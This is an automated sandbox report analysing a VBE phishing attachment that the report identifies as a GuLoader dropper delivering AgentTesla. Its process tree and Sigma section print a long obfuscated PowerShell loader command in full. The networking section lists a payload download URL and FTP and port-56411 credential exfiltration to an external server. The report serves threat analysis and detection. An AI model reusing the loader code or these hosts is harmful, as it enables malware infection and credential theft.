Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-08784 xlsx.vbe

Overview

General Information

Sample Name:PO-08784 xlsx.vbe
Analysis ID:755441
MD5:266115592f966240c14dfeeec624bdf5
SHA1:455a06b52d8e8f46d9a80067d3d1b1ea23036d65
SHA256:1df8d51920f7e386c6b86379363cc42dd86fe47a933e36cecd23c7b08d3118e2
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
May check the online IP address of the machine
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • wscript.exe (PID: 8268 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • cmd.exe (PID: 3416 cmdline: CMD.EXE /c echo C:\Windows MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 4432 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""TakRaeOcrSpnDieSelHa3Ax2Ne`"""Ov)Su]InpTouVibStlSaiFucAb HasBltPhaDitFeiMacTo paeWaxSltSleRarTenCa ThiDenkatOv MiVJeiRersktLuuDiabalUnAPylUnlDaoCocAb(moimunGatke FevNa1Da,KoiGrnAntbi FivCr2Se,KriLanhvtAg Savaa3go,NoilenMatNa PavSe4Co)Im;Ma[DeDTilStlStIKlmpupLuoCarMitHa(Tv`"""BakVieEnrBenSteEllTh3Hu2bi`"""Tr)Pl]PopHauLabsalIniRacFj UnsBetBoasltDkiPocHi PhevaxGntNoeGurMrnFl AcIAgnIntKoPDatAnrOs SwELinWeuHamStSCoySksMatSlePlmfeLMooKacdeaKolCueSysDyWaf(OmuFoiBonChtMy TavBo1Ha,KiiSonOptSh FavUn2Ud)Un;Na}Li'Sl;Ar`$jeMHyeDatSuhmuyUrlLi3Ne=Ha[TiMAdeLytFehFoyMilCa1re]co:Ov:beVNoisyrretWhuAbaTelNoAAklGalUnoSicLi(In0Dr,ro1Ch0De4Ro8Le5Ob7sk6Co,Le1Me2Sp2Sv8Lo8Ea,No6ph4Mi)Mi;Re`$StSTaeBelKovRefLrlTrgEbeNylBeiBrgDu=Pr(BrGFieGytDe-reISttKreViminPDorSaoIrpBeeLarJetAfySc Ex-WoPCraSptAzhDe Tr'SvHveKFoCCoUUd:Co\CebKraResAnaBrlBotCa\DetAprGuaManFisNofEsonurMemKoaSktSkiByoAbnOushaaSulScgCioSkrExiVitCimSieCyregnIreUd'Pa)tu.LuBBoeEthsueAlaDyrStsReeJa;Be`$UnGHirEmiFosRakUneEn Bu=Bi Br[AsSTiyUnsObtTweDrmBe.LiCStoRenorvKieVarAptEn]Ma:Ap:GeFKlrInoMumUdBseaImsInePl6fi4CaSVotBarBaiTonWagva(Se`$BeSLeeSnlBlvJafHulAfgpeeFrlBeiPhgGi)Ap;Pu[PiSOvyelsThtOxeSemge.SiRObuFrnBrtapiMumKleju.PiISpnRatIneUnrSyoAppneSPreSkrCovTiiJacAkeLessl.SiMStaTarFosCohTaaprlFa]Bl:Ci:TrCBooOupSkyAf(Fl`$UnGKurPaiKrsBrkDrece,di Pe0Up,Br Vl Pi`$GlMNieBatBlhSiyMylDe3Pr,Pr Sp`$ZoGArrCriTesHakPheSt.PrcGroSpuPonKntSp)Ph;Ho[TiMHeeAltAkhKnyPrlFa1Au]Si:Ru:CuEHjnPruMemFrSKoyressetKoeSpmVoLSloNucCaaMulpeeinsOvWBr(Sa`$AvMSkeNotSthDdyStlMe3Ir,Ka Ud0Sl)Ne#Sc;""";Function Methyl4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Teviss = $Teviss + $HS.Substring($i, 1); } $Teviss;}$Undefatigable0 = Methyl4 'SoIOrEReXAq ';$Undefatigable1= Methyl4 $Thyridia;&$Undefatigable0 $Undefatigable1;; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 8812 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 8896 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FA6.tmp" "c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • CasPol.exe (PID: 1352 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
PO-08784 xlsx.vbeWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth
  • 0xa2e:$s1: .CreateObject("WScript.Shell")
  • 0x3ed54:$p1: powershell.exe
  • 0x4b97e:$p1: powershell.exe

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1784183387.00000000093A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000011.00000000.1525854532.0000000001100000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Sigma Signatures

          Data Obfuscation

          barindex
          Sigma detected: Dot net compiler compiles file from suspicious location
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""Unk

          Snort Signatures

          Timestamp:192.168.11.20185.31.121.13649807212029927 11/28/22-18:14:18.239839
          SID:2029927
          Source Port:49807
          Destination Port:21
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20185.31.121.13649808564112851779 11/28/22-18:14:18.274476
          SID:2851779
          Source Port:49808
          Destination Port:56411
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://pesterbdd.com/images/Pester.pngAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: ftp.mcmprint.netVirustotal: Detection: 9%Perma Link
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
          Source: unknownHTTPS traffic detected: 54.91.59.199:443 -> 192.168.11.20:49805 version: TLS 1.2
          Source: Binary string: $}l8C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.pdb source: powershell.exe, 00000004.00000002.1687266902.0000000004531000.00000004.00000800.00020000.00000000.sdmp

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.11.20:49807 -> 185.31.121.136:21
          Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.11.20:49808 -> 185.31.121.136:56411
          May check the online IP address of the machine
          Source: unknownDNS query: name: api.ipify.org
          Source: unknownDNS query: name: api.ipify.org
          Source: unknownDNS query: name: api.ipify.org
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewIP Address: 54.91.59.199 54.91.59.199
          Source: Joe Sandbox ViewIP Address: 54.91.59.199 54.91.59.199
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wp-admin/includes/UtXRqIMUipDp192.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: b3solutionscws.comCache-Control: no-cache
          Source: global trafficTCP traffic: 192.168.11.20:49808 -> 185.31.121.136:56411
          Source: unknownFTP traffic detected: 185.31.121.136:21 -> 192.168.11.20:49807 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:14. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
          Source: CasPol.exe, 00000011.00000002.5824869400.000000000152A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b3solutionscws.com/wp-admin/includes/UtXRqIMUipDp192.pfb
          Source: powershell.exe, 00000004.00000002.1743148136.00000000073ED000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000011.00000002.5900965300.000000001FC83000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000011.00000003.1767910735.000000001FC3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: powershell.exe, 00000004.00000002.1743148136.00000000073ED000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000011.00000003.1767910735.000000001FC3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kmbImL.com
          Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oqyPj4HORVpk3nSGGk.net
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oqyPj4HORVpk3nSGGk.netXy
          Source: powershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000004.00000002.1676415365.00000000042E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000004.00000002.1676415365.00000000042E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgftp://ftp.mcmprint.netklogz
          Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
          Source: unknownDNS traffic detected: queries for: b3solutionscws.com
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D5FA09A recv,17_2_1D5FA09A
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wp-admin/includes/UtXRqIMUipDp192.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: b3solutionscws.comCache-Control: no-cache
          Source: unknownHTTPS traffic detected: 54.91.59.199:443 -> 192.168.11.20:49805 version: TLS 1.2

          System Summary

          barindex
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa 